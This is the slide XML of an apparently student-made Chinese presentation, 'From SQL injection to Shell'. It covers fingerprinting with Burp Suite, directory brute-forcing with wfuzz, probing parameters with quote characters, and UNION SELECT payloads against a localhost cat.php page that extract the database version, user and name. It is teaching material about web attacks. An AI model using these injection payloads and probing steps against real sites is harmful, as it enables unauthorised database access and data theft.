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84" r:id="rId3"/>
    <p:sldId id="285" r:id="rId4"/>
    <p:sldId id="283" r:id="rId5"/>
    <p:sldId id="264" r:id="rId6"/>
    <p:sldId id="286" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="287" r:id="rId9"/>
    <p:sldId id="288" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="290" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="276" r:id="rId14"/>
    <p:sldId id="277" r:id="rId15"/>
    <p:sldId id="278" r:id="rId16"/>
    <p:sldId id="279" r:id="rId17"/>
    <p:sldId id="280" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="292" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="293" r:id="rId22"/>
    <p:sldId id="294" r:id="rId23"/>
    <p:sldId id="268" r:id="rId24"/>
    <p:sldId id="295" r:id="rId25"/>
    <p:sldId id="270" r:id="rId26"/>
    <p:sldId id="296" r:id="rId27"/>
    <p:sldId id="297" r:id="rId28"/>
    <p:sldId id="28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g zhao" initials="cz" lastIdx="2" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="bb51b52c8ee094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70469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75986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589653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2642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661178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633757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392884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098362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87748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13214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47999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8325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25559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8905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12174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131042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97827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7CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/10/30</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21736011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ocalhost/cat.php?id=1%20UNION%20SELECT%201,@@version,3,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cat.php?id=1%20UNION%20SELECT%201,currentuser(),3,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localhost/cat.php?id=1%20UNION%20SELECT%201,database(),3,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From SQL injection to Shell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3006606" y="4819933"/>
            <a:ext cx="8689976" cy="1371599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Group members:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>zc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sn</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2111131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quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669164" y="2697252"/>
            <a:ext cx="7255063" cy="3171285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669164" y="1905781"/>
            <a:ext cx="7134597" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用应用程序如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://portswigger.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）设置为一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>很容易地获取相同的信息：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050253" y="309604"/>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sz="4800" dirty="0" smtClean="0"/>
              <a:t>指纹收集 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322956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1050253" y="309604"/>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sz="4800" dirty="0" smtClean="0"/>
              <a:t>指纹收集 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>directory Buster</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050878" y="1793886"/>
            <a:ext cx="10363826" cy="3419559"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wfuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://www.edge-security.com/wfuzz.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）可以用来检测目录和使用蛮力的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下面的命令可以运行来检测远程文件和目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1227800" y="3176478"/>
            <a:ext cx="9147309" cy="563009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接箭头连接符 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3057099" y="3616657"/>
            <a:ext cx="204716" cy="696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885899" y="3616657"/>
            <a:ext cx="27295" cy="1758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854890" y="3616657"/>
            <a:ext cx="1555845" cy="114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9007522" y="3616657"/>
            <a:ext cx="40943" cy="696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442949" y="4312693"/>
            <a:ext cx="1228299" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>输出颜色</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1951630" y="5375533"/>
            <a:ext cx="7579254" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>wordlists/general/big.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作为一个“蛮力”的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字典远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目录的名称</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5400422" y="4925157"/>
            <a:ext cx="5181227" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>响应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>表示忽略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>响应（页面未找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6605518" y="4393737"/>
            <a:ext cx="5585684" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字典中找到的每一个值替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单词</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FUZZ</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349494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3940365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>嗅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>探</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>猜想</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器上脚本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>整型参数试探</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>article.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=2'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  如果报错语法错误，说明存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>article.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=2-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不报错，如果显示是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>图则存在漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符型参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>   将报错</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报错</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111990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149" y="1509640"/>
            <a:ext cx="10698004" cy="4468079"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>UNION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是将两个查询语句的结果合并起来。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接的两个查询结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询语句的前面部分我们无法修改，因为这些是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的代码。然而，我们可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试其它表格的信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开发：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	a.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>试探出列的数量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	b.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>找出显示的列</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	c.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试出数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>meta-tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	d.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试出其它数据库或表中的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320175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4331602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>两种方法可以试出列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>数量：</a:t>
            </a:r>
